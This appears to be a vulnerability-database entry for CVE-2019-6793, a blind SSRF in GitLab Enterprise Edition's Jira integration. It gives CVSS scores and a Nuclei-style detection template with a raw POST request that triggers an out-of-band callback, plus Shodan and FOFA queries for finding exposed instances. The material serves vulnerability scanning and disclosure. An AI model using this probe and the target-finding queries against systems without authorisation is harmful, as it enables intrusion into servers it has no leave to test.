CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
HIGH
Availability Impact
LOW
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L
AI Score
Confidence
Low
An issue was discovered in GitLab Enterprise Edition before 11.5.8, 11.6.x before 11.6.6, and 11.7.x before 11.7.1. The Jira integration feature is vulnerable to an unauthenticated blind SSRF issue.
id: CVE-2019-6793
info:
name: GitLab Enterprise Edition - Server-Side Request Forgery
author: ritikchaddha
severity: high
description: |
An issue was discovered in GitLab Enterprise Edition before 11.5.8, 11.6.x before 11.6.6, and 11.7.x before 11.7.1. The Jira integration feature is vulnerable to an unauthenticated blind SSRF issue.
reference:
- https://gitlab.com/gitlab-org/gitlab-foss/-/issues/50748
- https://nvd.nist.gov/vuln/detail/CVE-2019-6793
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L
cvss-score: 7.0
cve-id: CVE-2019-6793
cwe-id: CWE-918
cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*
metadata:
max-request: 1
vendor: gitlab
product: gitlab
shodan-query: html:"GitLab Enterprise Edition"
fofa-query: body="GitLab Enterprise Edition"
tags: cve,cve2019,gitlab,enterprise,ssrf,blind
http:
- raw:
- |+
POST /-/jira/login/oauth/access_token HTTP/1.1
Host: {{interactsh-url}}
unsafe: true
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- "dns"
- type: word
part: body
words:
- "access_token="
- type: status
status:
- 200
# digest: 4a0a00473045022039518855306ba1537adc6ed399ae5fed39f605b26e74a45636222e143c3ef8c40221008b72d47276fabdc7554768e64bb4480902af26378bcf4d5ca2d14e34b7af75fa:922c64590222798bb761d5b6d8e72950
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
HIGH
Availability Impact
LOW
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L
AI Score
Confidence
Low